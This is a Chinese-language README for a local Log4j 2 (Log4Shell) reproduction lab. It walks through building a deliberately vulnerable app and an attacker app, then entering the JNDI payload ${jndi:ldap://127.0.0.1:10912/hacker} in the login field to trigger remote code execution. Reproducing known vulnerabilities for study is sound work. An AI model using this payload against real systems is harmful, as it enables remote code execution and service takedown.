介紹
Apache Log4j 2漏洞本地重現,下載打包兩分鐘搞定。
安裝教程
1。 安裝Jdk,版本小於jdk-8u191
下載地址: https://www。oracle。com/java/technologies/javase/javase8-archive-downloads。html
博主採用版本: java version 1。8。0_181
2。 安裝maven
博主採用版本: Apache Maven 3。6。0
3。 下載程式碼
在目錄D:/Tmp下開啟Cmd工具並克隆程式碼
git clone https://gitee。com/langdashu/bug-log4j2。git
4。 編譯打包
進入專案根目錄
cd bug-log4j2
編譯打包
mvn clean package
5。 啟動被攻擊應用
進入模組根目錄
cd bug-log4j2-application
啟動應用
java -jar target\bug-log4j2-application-1。0-SNAPSHOT。jar
6。 啟動發起攻擊應用
進入模組根目錄
cd bug-log4j2-attacker
啟動應用
java -jar target\bug-log4j2-attacker-1。0-SNAPSHOT。jar
使用說明
1。 訪問應用
在瀏覽器開啟登入頁,地址:http://127。0。0。1:8080/
2。 登入系統
使用賬號密碼admin/123456登入
登入成功並進入使用者資訊頁
3。 使用JNDI攻擊應用
在賬號欄輸入${jndi:ldap://127。0。0。1:10912/hacker},密碼任意字串。
4。 系統登入失敗
5。 重新整理頁面,發現服務已不可用,被攻擊應用宕機
6。 被攻擊應用控制檯輸出攻擊者注入的日誌及檔案
結論
被攻擊服務會執行攻擊者注入的惡意程式碼,其危險程度可顯而知。
UP主直通車(B站搜尋)
Log4j高危漏洞!具體原因解析!全網第一!
【核彈級】log4j漏洞,產生原因和解決方案
大叔宣告
所有資源來自網路,此案例僅僅是一個簡單的整合,希望可以幫助到大家。
重要提示
不搞事! 不搞事! 不搞事!